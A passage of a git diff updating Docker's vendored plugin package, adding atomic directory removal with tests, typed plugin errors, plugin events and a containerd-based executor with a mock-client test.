enabledOnly && !p.PluginObj.Enabled { + continue + } + if disabledOnly && p.PluginObj.Enabled { + continue + } + if pluginFilters.Contains("capability") { + for _, f := range p.GetTypes() { + if !pluginFilters.Match("capability", f.Capability) { + continue next + } + } + } out = append(out, p.PluginObj) } return out, nil @@ -333,7 +411,7 @@ func (pm *Manager) Push(ctx context.Context, name string, metaHeader http.Header return err } - ref, err := reference.ParseNamed(p.Name()) + ref, err := reference.ParseNormalizedNamed(p.Name()) if err != nil { return errors.Wrapf(err, "plugin has invalid name %v for push", p.Name()) } @@ -369,7 +447,8 @@ func (pm *Manager) Push(ctx context.Context, name string, metaHeader http.Header pm: pm, plugin: p, } - ls := &pluginLayerProvider{ + lss := make(map[string]distribution.PushLayerProvider) + lss[runtime.GOOS] = &pluginLayerProvider{ pm: pm, plugin: p, } @@ -392,7 +471,7 @@ func (pm *Manager) Push(ctx context.Context, name string, metaHeader http.Header RequireSchema2: true, }, ConfigMediaType: schema2.MediaTypePluginConfig, - LayerStore: ls, + LayerStores: lss, UploadManager: uploadManager, } @@ -411,8 +490,8 @@ func (r *pluginReference) References(id digest.Digest) []reference.Named { return []reference.Named{r.name} } -func (r *pluginReference) ReferencesByName(ref reference.Named) []reference.Association { - return []reference.Association{ +func (r *pluginReference) ReferencesByName(ref reference.Named) []refstore.Association { + return []refstore.Association{ { Ref: r.name, ID: r.pluginID, @@ -422,7 +501,7 @@ func (r *pluginReference) ReferencesByName(ref reference.Named) []reference.Asso func (r *pluginReference) Get(ref reference.Named) (digest.Digest, error) { if r.name.String() != ref.String() { - return digest.Digest(""), reference.ErrDoesNotExist + return digest.Digest(""), refstore.ErrDoesNotExist } return r.pluginID, nil } @@ -465,6 +544,11 @@ func (s *pluginConfigStore) RootFSFromConfig(c []byte) (*image.RootFS, error) { return configToRootFS(c) } +func (s *pluginConfigStore) PlatformFromConfig(c []byte) (*specs.Platform, error) { + // TODO: LCOW/Plugins. This will need revisiting. For now use the runtime OS + return &specs.Platform{OS: runtime.GOOS}, nil +} + type pluginLayerProvider struct { pm *Manager plugin *v2.Plugin @@ -542,10 +626,10 @@ func (pm *Manager) Remove(name string, config *types.PluginRmConfig) error { if !config.ForceRemove { if p.GetRefCount() > 0 { - return fmt.Errorf("plugin %s is in use", p.Name()) + return inUseError(p.Name()) } if p.IsEnabled() { - return fmt.Errorf("plugin %s is enabled", p.Name()) + return enabledError(p.Name()) } } @@ -560,52 +644,19 @@ func (pm *Manager) Remove(name string, config *types.PluginRmConfig) error { }() id := p.GetID() - pm.config.Store.Remove(p) pluginDir := filepath.Join(pm.config.Root, id) - if err := recursiveUnmount(pm.config.Root); err != nil { - logrus.WithField("dir", pm.config.Root).WithField("id", id).Warn(err) - } - if err := os.RemoveAll(pluginDir); err != nil { - logrus.Warnf("unable to remove %q from plugin remove: %v", pluginDir, err) - } - pm.config.LogPluginEvent(id, name, "remove") - return nil -} -func getMounts(root string) ([]string, error) { - infos, err := mount.GetMounts() - if err != nil { - return nil, errors.Wrap(err, "failed to read mount table while performing recursive unmount") + if err := mount.RecursiveUnmount(pluginDir); err != nil { + return errors.Wrap(err, "error unmounting plugin data") } - var mounts []string - for _, m := range infos { - if strings.HasPrefix(m.Mountpoint, root) { - mounts = append(mounts, m.Mountpoint) - } - } - - return mounts, nil -} - -func recursiveUnmount(root string) error { - mounts, err := getMounts(root) - if err != nil { + if err := atomicRemoveAll(pluginDir); err != nil { return err } - // sort in reverse-lexicographic order so the root mount will always be last - sort.Sort(sort.Reverse(sort.StringSlice(mounts))) - - for i, m := range mounts { - if err := mount.Unmount(m); err != nil { - if i == len(mounts)-1 { - return errors.Wrapf(err, "error performing recursive unmount on %s", root) - } - logrus.WithError(err).WithField("mountpoint", m).Warn("could not unmount") - } - } - + pm.config.Store.Remove(p) + pm.config.LogPluginEvent(id, name, "remove") + pm.publisher.Publish(EventRemove{Plugin: p.PluginObj}) return nil } @@ -627,25 +678,25 @@ func (pm *Manager) CreateFromContext(ctx context.Context, tarCtx io.ReadCloser, pm.muGC.RLock() defer pm.muGC.RUnlock() - ref, err := reference.ParseNamed(options.RepoName) + ref, err := reference.ParseNormalizedNamed(options.RepoName) if err != nil { return errors.Wrapf(err, "failed to parse reference %v", options.RepoName) } if _, ok := ref.(reference.Canonical); ok { return errors.Errorf("canonical references are not permitted") } - taggedRef := reference.WithDefaultTag(ref) - name := taggedRef.String() + name := reference.FamiliarString(reference.TagNameOnly(ref)) if err := pm.config.Store.validateName(name); err != nil { // fast check, real check is in createPlugin() return err } tmpRootFSDir, err := ioutil.TempDir(pm.tmpDir(), ".rootfs") - defer os.RemoveAll(tmpRootFSDir) if err != nil { return errors.Wrap(err, "failed to create temp directory") } + defer os.RemoveAll(tmpRootFSDir) + var configJSON []byte rootFS := splitConfigRootFSFromTar(tarCtx, &configJSON) @@ -655,7 +706,7 @@ func (pm *Manager) CreateFromContext(ctx context.Context, tarCtx io.ReadCloser, } defer rootFSBlob.Close() gzw := gzip.NewWriter(rootFSBlob) - layerDigester := digest.Canonical.New() + layerDigester := digest.Canonical.Digester() rootFSReader := io.TeeReader(rootFS, io.MultiWriter(gzw, layerDigester.Hash())) if err := chrootarchive.Untar(rootFSReader, tmpRootFSDir, nil); err != nil { @@ -700,6 +751,8 @@ func (pm *Manager) CreateFromContext(ctx context.Context, tarCtx io.ReadCloser, DiffIds: []string{layerDigester.Digest().String()}, } + config.DockerVersion = dockerversion.Version + configBlob, err := pm.blobStore.New() if err != nil { return err @@ -717,8 +770,9 @@ func (pm *Manager) CreateFromContext(ctx context.Context, tarCtx io.ReadCloser, if err != nil { return err } - p.PluginObj.PluginReference = taggedRef.String() + p.PluginObj.PluginReference = name + pm.publisher.Publish(EventCreate{Plugin: p.PluginObj}) pm.config.LogPluginEvent(p.PluginObj.ID, name, "create") return nil @@ -788,3 +842,35 @@ func splitConfigRootFSFromTar(in io.ReadCloser, config *[]byte) io.ReadCloser { }() return pr } + +func atomicRemoveAll(dir string) error { + renamed := dir + "-removing" + + err := os.Rename(dir, renamed) + switch { + case os.IsNotExist(err), err == nil: + // even if `dir` doesn't exist, we can still try and remove `renamed` + case os.IsExist(err): + // Some previous remove failed, check if the origin dir exists + if e := system.EnsureRemoveAll(renamed); e != nil { + return errors.Wrap(err, "rename target already exists and could not be removed") + } + if _, err := os.Stat(dir); os.IsNotExist(err) { + // origin doesn't exist, nothing left to do + return nil + } + + // attempt to rename again + if err := os.Rename(dir, renamed); err != nil { + return errors.Wrap(err, "failed to rename dir for atomic removal") + } + default: + return errors.Wrap(err, "failed to rename dir for atomic removal") + } + + if err := system.EnsureRemoveAll(renamed); err != nil { + os.Rename(renamed, dir) + return err + } + return nil +} diff --git a/vendor/github.com/docker/docker/plugin/backend_linux_test.go b/vendor/github.com/docker/docker/plugin/backend_linux_test.go new file mode 100644 index 0000000000..81cf2ebb76 --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/backend_linux_test.go @@ -0,0 +1,81 @@ +package plugin // import "github.com/docker/docker/plugin" + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" +) + +func TestAtomicRemoveAllNormal(t *testing.T) { + dir, err := ioutil.TempDir("", "atomic-remove-with-normal") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(dir) // just try to make sure this gets cleaned up + + if err := atomicRemoveAll(dir); err != nil { + t.Fatal(err) + } + + if _, err := os.Stat(dir); !os.IsNotExist(err) { + t.Fatalf("dir should be gone: %v", err) + } + if _, err := os.Stat(dir + "-removing"); !os.IsNotExist(err) { + t.Fatalf("dir should be gone: %v", err) + } +} + +func TestAtomicRemoveAllAlreadyExists(t *testing.T) { + dir, err := ioutil.TempDir("", "atomic-remove-already-exists") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(dir) // just try to make sure this gets cleaned up + + if err := os.MkdirAll(dir+"-removing", 0755); err != nil { + t.Fatal(err) + } + defer os.RemoveAll(dir + "-removing") + + if err := atomicRemoveAll(dir); err != nil { + t.Fatal(err) + } + + if _, err := os.Stat(dir); !os.IsNotExist(err) { + t.Fatalf("dir should be gone: %v", err) + } + if _, err := os.Stat(dir + "-removing"); !os.IsNotExist(err) { + t.Fatalf("dir should be gone: %v", err) + } +} + +func TestAtomicRemoveAllNotExist(t *testing.T) { + if err := atomicRemoveAll("/not-exist"); err != nil { + t.Fatal(err) + } + + dir, err := ioutil.TempDir("", "atomic-remove-already-exists") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(dir) // just try to make sure this gets cleaned up + + // create the removing dir, but not the "real" one + foo := filepath.Join(dir, "foo") + removing := dir + "-removing" + if err := os.MkdirAll(removing, 0755); err != nil { + t.Fatal(err) + } + + if err := atomicRemoveAll(dir); err != nil { + t.Fatal(err) + } + + if _, err := os.Stat(foo); !os.IsNotExist(err) { + t.Fatalf("dir should be gone: %v", err) + } + if _, err := os.Stat(removing); !os.IsNotExist(err) { + t.Fatalf("dir should be gone: %v", err) + } +} diff --git a/vendor/github.com/docker/docker/plugin/backend_unsupported.go b/vendor/github.com/docker/docker/plugin/backend_unsupported.go index 66e6dab9e8..c0666e858e 100644 --- a/vendor/github.com/docker/docker/plugin/backend_unsupported.go +++ b/vendor/github.com/docker/docker/plugin/backend_unsupported.go @@ -1,15 +1,16 @@ // +build !linux -package plugin +package plugin // import "github.com/docker/docker/plugin" import ( + "context" "errors" "io" "net/http" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" - "github.com/docker/docker/reference" - "golang.org/x/net/context" + "github.com/docker/docker/api/types/filters" ) var errNotSupported = errors.New("plugins are not supported on this platform") @@ -35,7 +36,7 @@ func (pm *Manager) Privileges(ctx context.Context, ref reference.Named, metaHead } // Pull pulls a plugin, check if the correct privileges are provided and install the plugin. -func (pm *Manager) Pull(ctx context.Context, ref reference.Named, name string, metaHeader http.Header, authConfig *types.AuthConfig, privileges types.PluginPrivileges, out io.Writer) error { +func (pm *Manager) Pull(ctx context.Context, ref reference.Named, name string, metaHeader http.Header, authConfig *types.AuthConfig, privileges types.PluginPrivileges, out io.Writer, opts ...CreateOpt) error { return errNotSupported } @@ -45,7 +46,7 @@ func (pm *Manager) Upgrade(ctx context.Context, ref reference.Named, name string } // List displays the list of plugins and associated metadata. -func (pm *Manager) List() ([]types.Plugin, error) { +func (pm *Manager) List(pluginFilters filters.Args) ([]types.Plugin, error) { return nil, errNotSupported } diff --git a/vendor/github.com/docker/docker/plugin/blobstore.go b/vendor/github.com/docker/docker/plugin/blobstore.go index dc9e598e04..a24e7bdf4f 100644 --- a/vendor/github.com/docker/docker/plugin/blobstore.go +++ b/vendor/github.com/docker/docker/plugin/blobstore.go @@ -1,20 +1,24 @@ -package plugin +package plugin // import "github.com/docker/docker/plugin" import ( + "context" + "fmt" "io" "io/ioutil" "os" "path/filepath" + "runtime" - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" "github.com/docker/docker/distribution/xfer" "github.com/docker/docker/image" "github.com/docker/docker/layer" "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/chrootarchive" "github.com/docker/docker/pkg/progress" + "github.com/opencontainers/go-digest" + specs "github.com/opencontainers/image-spec/specs-go/v1" "github.com/pkg/errors" - "golang.org/x/net/context" + "github.com/sirupsen/logrus" ) type blobstore interface { @@ -86,7 +90,7 @@ type insertion struct { } func newInsertion(tempFile *os.File) *insertion { - digester := digest.Canonical.New() + digester := digest.Canonical.Digester() return &insertion{f: tempFile, digester: digester, Writer: io.MultiWriter(tempFile, digester.Hash())} } @@ -124,7 +128,7 @@ type downloadManager struct { configDigest digest.Digest } -func (dm *downloadManager) Download(ctx context.Context, initialRootFS image.RootFS, layers []xfer.DownloadDescriptor, progressOutput progress.Output) (image.RootFS, func(), error) { +func (dm *downloadManager) Download(ctx context.Context, initialRootFS image.RootFS, os string, layers []xfer.DownloadDescriptor, progressOutput progress.Output) (image.RootFS, func(), error) { for _, l := range layers { b, err := dm.blobStore.New() if err != nil { @@ -141,8 +145,9 @@ func (dm *downloadManager) Download(ctx context.Context, initialRootFS image.Roo if err != nil { return initialRootFS, nil, err } - digester := digest.Canonical.New() - if _, err := archive.ApplyLayer(dm.tmpDir, io.TeeReader(inflatedLayerData, digester.Hash())); err != nil { + defer inflatedLayerData.Close() + digester := digest.Canonical.Digester() + if _, err := chrootarchive.ApplyLayer(dm.tmpDir, io.TeeReader(inflatedLayerData, digester.Hash())); err != nil { return initialRootFS, nil, err } initialRootFS.Append(layer.DiffID(digester.Digest())) @@ -174,8 +179,12 @@ func (dm *downloadManager) Put(dt []byte) (digest.Digest, error) { } func (dm *downloadManager) Get(d digest.Digest) ([]byte, error) { - return nil, digest.ErrDigestNotFound + return nil, fmt.Errorf("digest not found") } func (dm *downloadManager) RootFSFromConfig(c []byte) (*image.RootFS, error) { return configToRootFS(c) } +func (dm *downloadManager) PlatformFromConfig(c []byte) (*specs.Platform, error) { + // TODO: LCOW/Plugins. This will need revisiting. For now use the runtime OS + return &specs.Platform{OS: runtime.GOOS}, nil +} diff --git a/vendor/github.com/docker/docker/plugin/defs.go b/vendor/github.com/docker/docker/plugin/defs.go index 927f639166..31f7c6bcc3 100644 --- a/vendor/github.com/docker/docker/plugin/defs.go +++ b/vendor/github.com/docker/docker/plugin/defs.go @@ -1,16 +1,18 @@ -package plugin +package plugin // import "github.com/docker/docker/plugin" import ( "sync" "github.com/docker/docker/pkg/plugins" "github.com/docker/docker/plugin/v2" + "github.com/opencontainers/runtime-spec/specs-go" ) // Store manages the plugin inventory in memory and on-disk type Store struct { sync.RWMutex - plugins map[string]*v2.Plugin + plugins map[string]*v2.Plugin + specOpts map[string][]SpecOpt /* handlers are necessary for transition path of legacy plugins * to the new model. Legacy plugins use Handle() for registering an * activation callback.*/ @@ -18,9 +20,31 @@ type Store struct { } // NewStore creates a Store. -func NewStore(libRoot string) *Store { +func NewStore() *Store { return &Store{ plugins: make(map[string]*v2.Plugin), + specOpts: make(map[string][]SpecOpt), handlers: make(map[string][]func(string, *plugins.Client)), } } + +// SpecOpt is used for subsystems that need to modify the runtime spec of a plugin +type SpecOpt func(*specs.Spec) + +// CreateOpt is used to configure specific plugin details when created +type CreateOpt func(p *v2.Plugin) + +// WithSwarmService is a CreateOpt that flags the passed in a plugin as a plugin +// managed by swarm +func WithSwarmService(id string) CreateOpt { + return func(p *v2.Plugin) { + p.SwarmServiceID = id + } +} + +// WithSpecMounts is a SpecOpt which appends the provided mounts to the runtime spec +func WithSpecMounts(mounts []specs.Mount) SpecOpt { + return func(s *specs.Spec) { + s.Mounts = append(s.Mounts, mounts...) + } +} diff --git a/vendor/github.com/docker/docker/plugin/errors.go b/vendor/github.com/docker/docker/plugin/errors.go new file mode 100644 index 0000000000..44d99b39b2 --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/errors.go @@ -0,0 +1,66 @@ +package plugin // import "github.com/docker/docker/plugin" + +import "fmt" + +type errNotFound string + +func (name errNotFound) Error() string { + return fmt.Sprintf("plugin %q not found", string(name)) +} + +func (errNotFound) NotFound() {} + +type errAmbiguous string + +func (name errAmbiguous) Error() string { + return fmt.Sprintf("multiple plugins found for %q", string(name)) +} + +func (name errAmbiguous) InvalidParameter() {} + +type errDisabled string + +func (name errDisabled) Error() string { + return fmt.Sprintf("plugin %s found but disabled", string(name)) +} + +func (name errDisabled) Conflict() {} + +type invalidFilter struct { + filter string + value []string +} + +func (e invalidFilter) Error() string { + msg := "Invalid filter '" + e.filter + if len(e.value) > 0 { + msg += fmt.Sprintf("=%s", e.value) + } + return msg + "'" +} + +func (invalidFilter) InvalidParameter() {} + +type inUseError string + +func (e inUseError) Error() string { + return "plugin " + string(e) + " is in use" +} + +func (inUseError) Conflict() {} + +type enabledError string + +func (e enabledError) Error() string { + return "plugin " + string(e) + " is enabled" +} + +func (enabledError) Conflict() {} + +type alreadyExistsError string + +func (e alreadyExistsError) Error() string { + return "plugin " + string(e) + " already exists" +} + +func (alreadyExistsError) Conflict() {} diff --git a/vendor/github.com/docker/docker/plugin/events.go b/vendor/github.com/docker/docker/plugin/events.go new file mode 100644 index 0000000000..d204340aa7 --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/events.go @@ -0,0 +1,111 @@ +package plugin // import "github.com/docker/docker/plugin" + +import ( + "fmt" + "reflect" + + "github.com/docker/docker/api/types" +) + +// Event is emitted for actions performed on the plugin manager +type Event interface { + matches(Event) bool +} + +// EventCreate is an event which is emitted when a plugin is created +// This is either by pull or create from context. +// +// Use the `Interfaces` field to match only plugins that implement a specific +// interface. +// These are matched against using "or" logic. +// If no interfaces are listed, all are matched. +type EventCreate struct { + Interfaces map[string]bool + Plugin types.Plugin +} + +func (e EventCreate) matches(observed Event) bool { + oe, ok := observed.(EventCreate) + if !ok { + return false + } + if len(e.Interfaces) == 0 { + return true + } + + var ifaceMatch bool + for _, in := range oe.Plugin.Config.Interface.Types { + if e.Interfaces[in.Capability] { + ifaceMatch = true + break + } + } + return ifaceMatch +} + +// EventRemove is an event which is emitted when a plugin is removed +// It maches on the passed in plugin's ID only. +type EventRemove struct { + Plugin types.Plugin +} + +func (e EventRemove) matches(observed Event) bool { + oe, ok := observed.(EventRemove) + if !ok { + return false + } + return e.Plugin.ID == oe.Plugin.ID +} + +// EventDisable is an event that is emitted when a plugin is disabled +// It maches on the passed in plugin's ID only. +type EventDisable struct { + Plugin types.Plugin +} + +func (e EventDisable) matches(observed Event) bool { + oe, ok := observed.(EventDisable) + if !ok { + return false + } + return e.Plugin.ID == oe.Plugin.ID +} + +// EventEnable is an event that is emitted when a plugin is disabled +// It maches on the passed in plugin's ID only. +type EventEnable struct { + Plugin types.Plugin +} + +func (e EventEnable) matches(observed Event) bool { + oe, ok := observed.(EventEnable) + if !ok { + return false + } + return e.Plugin.ID == oe.Plugin.ID +} + +// SubscribeEvents provides an event channel to listen for structured events from +// the plugin manager actions, CRUD operations. +// The caller must call the returned `cancel()` function once done with the channel +// or this will leak resources. +func (pm *Manager) SubscribeEvents(buffer int, watchEvents ...Event) (eventCh <-chan interface{}, cancel func()) { + topic := func(i interface{}) bool { + observed, ok := i.(Event) + if !ok { + panic(fmt.Sprintf("unexpected type passed to event channel: %v", reflect.TypeOf(i))) + } + for _, e := range watchEvents { + if e.matches(observed) { + return true + } + } + // If no specific events are specified always assume a matched event + // If some events were specified and none matched above, then the event + // doesn't match + return watchEvents == nil + } + ch := pm.publisher.SubscribeTopicWithBuffer(topic, buffer) + cancelFunc := func() { pm.publisher.Evict(ch) } + return ch, cancelFunc +} diff --git a/vendor/github.com/docker/docker/plugin/executor/containerd/containerd.go b/vendor/github.com/docker/docker/plugin/executor/containerd/containerd.go new file mode 100644 index 0000000000..8f1c8a4a19 --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/executor/containerd/containerd.go @@ -0,0 +1,175 @@ +package containerd // import "github.com/docker/docker/plugin/executor/containerd" + +import ( + "context" + "io" + "path/filepath" + "sync" + "time" + + "github.com/containerd/containerd/cio" + "github.com/containerd/containerd/runtime/linux/runctypes" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/libcontainerd" + "github.com/opencontainers/runtime-spec/specs-go" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" +) + +// pluginNamespace is the name used for the plugins namespace +const pluginNamespace = "plugins.moby" + +// ExitHandler represents an object that is called when the exit event is received from containerd +type ExitHandler interface { + HandleExitEvent(id string) error +} + +// Client is used by the exector to perform operations. +// TODO(@cpuguy83): This should really just be based off the containerd client interface. +// However right now this whole package is tied to github.com/docker/docker/libcontainerd +type Client interface { + Create(ctx context.Context, containerID string, spec *specs.Spec, runtimeOptions interface{}) error + Restore(ctx context.Context, containerID string, attachStdio libcontainerd.StdioCallback) (alive bool, pid int, err error) + Status(ctx context.Context, containerID string) (libcontainerd.Status, error) + Delete(ctx context.Context, containerID string) error + DeleteTask(ctx context.Context, containerID string) (uint32, time.Time, error) + Start(ctx context.Context, containerID, checkpointDir string, withStdin bool, attachStdio libcontainerd.StdioCallback) (pid int, err error) + SignalProcess(ctx context.Context, containerID, processID string, signal int) error +} + +// New creates a new containerd plugin executor +func New(rootDir string, remote libcontainerd.Remote, exitHandler ExitHandler) (*Executor, error) { + e := &Executor{ + rootDir: rootDir, + exitHandler: exitHandler, + } + client, err := remote.NewClient(pluginNamespace, e) + if err != nil { + return nil, errors.Wrap(err, "error creating containerd exec client") + } + e.client = client + return e, nil +} + +// Executor is the containerd client implementation of a plugin executor +type Executor struct { + rootDir string + client Client + exitHandler ExitHandler +} + +// deleteTaskAndContainer deletes plugin task and then plugin container from containerd +func deleteTaskAndContainer(ctx context.Context, cli Client, id string) { + _, _, err := cli.DeleteTask(ctx, id) + if err != nil && !errdefs.IsNotFound(err) { + logrus.WithError(err).WithField("id", id).Error("failed to delete plugin task from containerd") + } + + err = cli.Delete(ctx, id) + if err != nil && !errdefs.IsNotFound(err) { + logrus.WithError(err).WithField("id", id).Error("failed to delete plugin container from containerd") + } +} + +// Create creates a new container +func (e *Executor) Create(id string, spec specs.Spec, stdout, stderr io.WriteCloser) error { + opts := runctypes.RuncOptions{ + RuntimeRoot: filepath.Join(e.rootDir, "runtime-root"), + } + ctx := context.Background() + err := e.client.Create(ctx, id, &spec, &opts) + if err != nil { + status, err2 := e.client.Status(ctx, id) + if err2 != nil { + if !errdefs.IsNotFound(err2) { + logrus.WithError(err2).WithField("id", id).Warn("Received an error while attempting to read plugin status") + } + } else { + if status != libcontainerd.StatusRunning && status != libcontainerd.StatusUnknown { + if err2 := e.client.Delete(ctx, id); err2 != nil && !errdefs.IsNotFound(err2) { + logrus.WithError(err2).WithField("plugin", id).Error("Error cleaning up containerd container") + } + err = e.client.Create(ctx, id, &spec, &opts) + } + } + + if err != nil { + return errors.Wrap(err, "error creating containerd container") + } + } + + _, err = e.client.Start(ctx, id, "", false, attachStreamsFunc(stdout, stderr)) + if err != nil { + deleteTaskAndContainer(ctx, e.client, id) + } + return err +} + +// Restore restores a container +func (e *Executor) Restore(id string, stdout, stderr io.WriteCloser) (bool, error) { + alive, _, err := e.client.Restore(context.Background(), id, attachStreamsFunc(stdout, stderr)) + if err != nil && !errdefs.IsNotFound(err) { + return false, err + } + if !alive { + deleteTaskAndContainer(context.Background(), e.client, id) + } + return alive, nil +} + +// IsRunning returns if the container with the given id is running +func (e *Executor) IsRunning(id string) (bool, error) { + status, err := e.client.Status(context.Background(), id) + return status == libcontainerd.StatusRunning, err +} + +// Signal sends the specified signal to the container +func (e *Executor) Signal(id string, signal int) error { + return e.client.SignalProcess(context.Background(), id, libcontainerd.InitProcessName, signal) +} + +// ProcessEvent handles events from containerd +// All events are ignored except the exit event, which is sent of to the stored handler +func (e *Executor) ProcessEvent(id string, et libcontainerd.EventType, ei libcontainerd.EventInfo) error { + switch et { + case libcontainerd.EventExit: + deleteTaskAndContainer(context.Background(), e.client, id) + return e.exitHandler.HandleExitEvent(ei.ContainerID) + } + return nil +} + +type rio struct { + cio.IO + + wg sync.WaitGroup +} + +func (c *rio) Wait() { + c.wg.Wait() + c.IO.Wait() +} + +func attachStreamsFunc(stdout, stderr io.WriteCloser) libcontainerd.StdioCallback { + return func(iop *cio.DirectIO) (cio.IO, error) { + if iop.Stdin != nil { + iop.Stdin.Close() + // closing stdin shouldn't be needed here, it should never be open + panic("plugin stdin shouldn't have been created!") + } + + rio := &rio{IO: iop} + rio.wg.Add(2) + go func() { + io.Copy(stdout, iop.Stdout) + stdout.Close() + rio.wg.Done() + }() + go func() { + io.Copy(stderr, iop.Stderr) + stderr.Close() + rio.wg.Done() + }() + return rio, nil + } +} diff --git a/vendor/github.com/docker/docker/plugin/executor/containerd/containerd_test.go b/vendor/github.com/docker/docker/plugin/executor/containerd/containerd_test.go new file mode 100644 index 0000000000..e27063b1d8 --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/executor/containerd/containerd_test.go @@ -0,0 +1,148 @@ +package containerd + +import ( + "context" + "io/ioutil" + "os" + "sync" + "testing" + "time" + + "github.com/docker/docker/libcontainerd" + "github.com/opencontainers/runtime-spec/specs-go" + "github.com/pkg/errors" + "gotest.tools/assert" +) + +func TestLifeCycle(t *testing.T) { + t.Parallel() + + mock := newMockClient() + exec, cleanup := setupTest(t, mock, mock) + defer cleanup() + + id := "test-create" + mock.simulateStartError(true, id) + err := exec.Create(id, specs.Spec{}, nil, nil) + assert.Assert(t, err != nil) + mock.simulateStartError(false, id) + + err = exec.Create(id, specs.Spec{}, nil, nil) + assert.Assert(t, err) + running, _ := exec.IsRunning(id) + assert.Assert(t, running) + + // create with the same ID + err = exec.Create(id, specs.Spec{}, nil, nil) + assert.Assert(t, err != nil) + + mock.HandleExitEvent(id) // simulate a plugin that exits + + err = exec.Create(id, specs.Spec{}, nil, nil) + assert.Assert(t, err) +} + +func setupTest(t *testing.T, client Client, eh ExitHandler) (*Executor, func()) { + rootDir, err := ioutil.TempDir("", "test-daemon") + assert.Assert(t, err) + assert.Assert(t, client != nil) + assert.Assert(t, eh != nil) + + return &Executor{ + rootDir: rootDir, + client: client, + exitHandler: eh, + }, func() { + assert.Assert(t, os.RemoveAll(rootDir)) + } +} + +type mockClient struct { + mu sync.Mutex + containers map[string]bool + errorOnStart map[string]bool +} + +func newMockClient() *mockClient { + return &mockClient{ + containers: make(map[string]bool), + errorOnStart: make(map[string]bool), + } +} + +func (c *mockClient) Create(ctx context.Context, id string, _ *specs.Spec, _ interface{}) error { + c.mu.Lock() + defer c.mu.Unlock() + + if _, ok := c.containers[id]; ok { + return errors.New("exists") + } + + c.containers[id] = false + return nil +} + +func (c *mockClient) Restore(ctx context.Context, id string, attachStdio libcontainerd.StdioCallback) (alive bool, pid int, err error) { + return false, 0, nil +} + +func (c *mockClient) Status(ctx context.Context, id string) (libcontainerd.Status, error) { + c.mu.Lock() + defer c.mu.Unlock() + + running, ok := c.containers[id] + if !ok { + return libcontainerd.StatusUnknown, errors.New("not found") + } + if running { + return libcontainerd.StatusRunning, nil + } + return libcontainerd.StatusStopped, nil +} + +func (c *mockClient) Delete(ctx context.Context, id string) error { + c.mu.Lock() + defer c.mu.Unlock() + delete(c.containers, id) + return nil +} + +func (c *mockClient) DeleteTask(ctx context.Context, id string) (uint32, time.Time, error) { + return 0, time.Time{}, nil +} + +func (c *mockClient) Start(ctx context.Context, id, checkpointDir string, withStdin bool, attachStdio libcontainerd.StdioCallback) (pid int, err error) { + c.mu.Lock() + defer c.mu.Unlock() + + if _, ok := c.containers[id]; !ok { + return 0, errors.New("not found") + } + + if c.errorOnStart[id] { + return 0, errors.New("some startup error") + } + c.containers[id] = true + return 1, nil +} + +func (c *mockClient) SignalProcess(ctx context.Context, containerID, processID string, signal int) error { + return nil +} + +func (c *mockClient) simulateStartError(sim bool, id string) { + c.mu.Lock() + defer c.mu.Unlock() + if sim { + c.errorOnStart[id] = sim + return + } + delete(c.errorOnStart, id) +} + +func (c *mockClient) HandleExitEvent(id string) error { + c.mu.Lock() + defer c.mu.Unlock() + delete(c.containers, id) + return nil +} diff --git a/vendor/github.com/docker/docker/plugin/manager.go b/vendor/github.com/docker/docker/plugin/manager.go index f260aa61a7..c6f896129b 100644 --- a/vendor/github.com/docker/docker/plugin/manager.go +++ b/vendor/github.com/docker/docker/plugin/manager.go @@ -1,4 +1,4 @@ -package plugin +package plugin // import "github.com/docker/docker/plugin" import ( "encoding/json" @@ -8,21 +8,25 @@ import ( "path/filepath" "reflect" "regexp" + "sort" "strings" "sync" - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" "github.com/docker/docker/image" "github.com/docker/docker/layer" - "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/pkg/authorization" "github.com/docker/docker/pkg/ioutils" "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/pkg/pubsub" + "github.com/docker/docker/pkg/system" "github.com/docker/docker/plugin/v2" - "github.com/docker/docker/reference" "github.com/docker/docker/registry" + "github.com/opencontainers/go-digest" + "github.com/opencontainers/runtime-spec/specs-go" "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) const configFileName = "config.json" @@ -30,9 +34,17 @@ const rootFSFileName = "rootfs" var validFullID = regexp.MustCompile(`^([a-f0-9]{64})$`) -func (pm *Manager) restorePlugin(p *v2.Plugin) error { +// Executor is the interface that the plugin manager uses to interact with for starting/stopping plugins +type Executor interface { + Create(id string, spec specs.Spec, stdout, stderr io.WriteCloser) error + IsRunning(id string) (bool, error) + Restore(id string, stdout, stderr io.WriteCloser) (alive bool, err error) + Signal(id string, signal int) error +} + +func (pm *Manager) restorePlugin(p *v2.Plugin, c *controller) error { if p.IsEnabled() { - return pm.restore(p) + return pm.restore(p, c) } return nil } @@ -42,22 +54,27 @@ type eventLogger func(id, name, action string) // ManagerConfig defines configuration needed to start new manager. type ManagerConfig struct { Store *Store // remove - Executor libcontainerd.Remote RegistryService registry.Service LiveRestoreEnabled bool // TODO: remove LogPluginEvent eventLogger Root string ExecRoot string + CreateExecutor ExecutorCreator + AuthzMiddleware *authorization.Middleware } +// ExecutorCreator is used in the manager config to pass in an `Executor` +type ExecutorCreator func(*Manager) (Executor, error) + // Manager controls the plugin subsystem. type Manager struct { - config ManagerConfig - mu sync.RWMutex // protects cMap - muGC sync.RWMutex // protects blobstore deletions - cMap map[*v2.Plugin]*controller - containerdClient libcontainerd.Client - blobStore *basicBlobStore + config ManagerConfig + mu sync.RWMutex // protects cMap + muGC sync.RWMutex // protects blobstore deletions + cMap map[*v2.Plugin]*controller + blobStore *basicBlobStore + publisher *pubsub.Publisher + executor Executor } // controller represents the manager's control on a plugin. @@ -89,20 +106,17 @@ func NewManager(config ManagerConfig) (*Manager, error) { manager := &Manager{ config: config, } - if err := 